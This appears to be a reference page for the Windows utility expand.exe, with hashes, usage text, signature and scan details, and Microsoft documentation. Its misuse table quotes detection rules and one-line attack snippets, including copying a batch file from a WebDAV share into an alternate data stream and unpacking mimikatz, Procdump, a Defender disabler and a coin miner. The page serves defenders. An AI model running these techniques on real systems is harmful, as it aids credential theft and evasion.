expand.exe

  • File Path: C:\WINDOWS\system32\expand.exe
  • Description: LZ Expansion Utility

Hashes

Type Hash
MD5 3B9723F0F56FB52B8A16D9DA83DA04B1
SHA1 7D12F4AEBDEF68150C4D4D7B661931119BBDD1F6
SHA256 3D5BD1FD4CE50C491AF6A82A764C39028063B95F25C954092FFF54C60FA57CF9
SHA384 011DC010718E61D9450AA3986686C29465857282F5811041C6DDCCCCDD0BAD46FAA255AD1D804E3A3476458722467CF7
SHA512 702F9FFD28164CAA651D739BE00A0DFBB597AAF332AAA558979E16320AB9DD10C675FCEB98A4D3FF8AF0369970D898DC0BAC9EED73DF32A979D61D84605195CC
SSDEEP 768:lsCla1TqS35gmGdgCT//Ix2St++DeHRYejfS04LGqiazf/GRHMpCUn:lsCla1Tn35dCYxUJO9GE3G5MpCUn
IMP 6CFFC29FB5449A92D29D48B72EEB323D
PESHA1 FC1A5183593995F52105FA300ADB61B8D993B318
PE256 7CF77A84829BEF933416DA68987EE6B88A56C26640885C1ED4A8E0273D834019

Runtime Data

Usage (stdout):

Microsoft (R) File Expansion Utility
Copyright (c) Microsoft Corporation. All rights reserved.

Expands one or more compressed files.

EXPAND [-R] Source Destination
EXPAND -R Source [Destination]
EXPAND -I Source [Destination]
EXPAND -D Source.cab [-F:Files]
EXPAND Source.cab -F:Files Destination

  -R		Rename expanded files.
  -I		Rename expanded files but ignore directory structure.
  -D		Display list of files in source.
  Source	Source file specification.  Wildcards may be used.
  -F:Files	Name of files to expand from a .CAB.
  Destination	Destination file | path specification.
		Destination may be a directory.
		If Source is multiple files and -r is not specified,
		Destination must be a directory.

Loaded Modules:

Path
C:\WINDOWS\system32\expand.exe
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: expand
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 5.00 (WinBuild.160101.0800)
  • Product Version: 5.00
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/74
  • VirusTotal Link: https://www.virustotal.com/gui/file/3d5bd1fd4ce50c491af6a82a764c39028063b95f25c954092fff54c60fa57cf9/detection

Possible Misuse

The following table contains possible examples of expand.exe being misused. While expand.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\expand.exe' DRL 1.0
sigma posh_pm_decompress_commands.yml Payload\|contains: 'Expand-Archive' DRL 1.0
sigma proc_creation_win_expand_cabinet_files.yml description: Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack DRL 1.0
sigma proc_creation_win_expand_cabinet_files.yml - '\expand.exe' DRL 1.0
LOLBAS Expand.yml Name: Expand.exe  
LOLBAS Expand.yml - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat  
LOLBAS Expand.yml - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat  
LOLBAS Expand.yml - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat  
LOLBAS Expand.yml - Path: C:\Windows\System32\Expand.exe  
LOLBAS Expand.yml - Path: C:\Windows\SysWOW64\Expand.exe  
atomic-red-team T1003.001.md Expand-Archive $zippath $parentpath\wce -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.004.md Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.006.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1021.001.md Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.(Citation: Alperovitch Malware)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1021.002.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1027.md Expand-Archive -path “$env:temp\T1027.zip” -DestinationPath “$env:temp\temp_T1027.zip" -Force MIT License. © 2018 Red Canary
atomic-red-team T1036.md Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force MIT License. © 2018 Red Canary
atomic-red-team T1048.002.md Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl MIT License. © 2018 Red Canary
atomic-red-team T1055.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1055.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md $ppid=Get-Process #{parent_process_name} | select -expand id MIT License. © 2018 Red Canary
atomic-red-team T1071.001.md Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl MIT License. © 2018 Red Canary
atomic-red-team T1090.003.md expand-archive -LiteralPath “$env:temp\tor.zip” -DestinationPath “$env:temp\tor” MIT License. © 2018 Red Canary
atomic-red-team T1095.md Expand-Archive $zippath $parentpath -Force MIT License. © 2018 Red Canary
atomic-red-team T1105.md Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md $ppid=Get-Process #{parent_process_name} | select -expand id MIT License. © 2018 Red Canary
atomic-red-team T1207.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1207.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1485.md Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force MIT License. © 2018 Red Canary
atomic-red-team T1550.002.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md Expand-Archive #{file_path}\Modified-SysInternalsSuite.zip #{file_path}\sysinternals -Force MIT License. © 2018 Red Canary
atomic-red-team T1558.001.md $domain = gwmi Win32_ComputerSystem | Select -Expand Domain MIT License. © 2018 Red Canary
atomic-red-team T1558.001.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md expand-archive -LiteralPath “$env:temp\defendercontrol.zip” -DestinationPath “$env:temp\DefenderControl” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md expand \webdav\folder\file.bat #{path}\file.txt:file.bat MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1588.002.md Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force MIT License. © 2018 Red Canary
signature-base apt_op_honeybee.yar $x1 = “cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32” CC BY-NC 4.0
signature-base gen_pirpi.yar $x1 = “expand.exe1.gif” fullword ascii CC BY-NC 4.0
signature-base gen_pirpi.yar $c1 = “expand.exe” fullword ascii CC BY-NC 4.0
stockpile cc191baa-7472-4386-a2f4-42f203f1acfd.yml Expand-Archive -LiteralPath $download_folder"PSTools.zip" -DestinationPath $staging_folder; Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder; Apache-2.0
stockpile 46da2385-cf37-49cb-ba4b-a739c7a19de4.yml Expand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\; Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


expand

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Expands one or more compressed files. You can also use this command to retrieve compressed files from distribution disks.

The expand command can also run from the Windows Recovery Console, using different parameters. For more information, see Windows Recovery Environment (WinRE).

Syntax

expand [/r] <source> <destination>
expand /r <source> [<destination>]
expand /i <source> [<destination>]
expand /d <source>.cab [/f:<files>]
expand <source>.cab /f:<files> <destination>

Parameters

Parameter Description
/r Renames expanded files.
source Specifies the files to expand. Source can consist of a drive letter and colon, a directory name, a file name, or a combination of these. You can use wildcards (* or ?).
destination Specifies where files are to be expanded.<p>If source consists of multiple files and you don’t specify /r, the destination must be a directory. Destination can consist of a drive letter and colon, a directory name, a file name, or a combination of these. Destination file | path specification.
/i Renames expanded files but ignores the directory structure.
/d Displays a list of files in the source location. Doesn’t expand or extract the files.
/f:<files> Specifies the files in a cabinet (.cab) file that you want to expand. You can use wildcards (* or ?).
/? Displays help at the command prompt.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.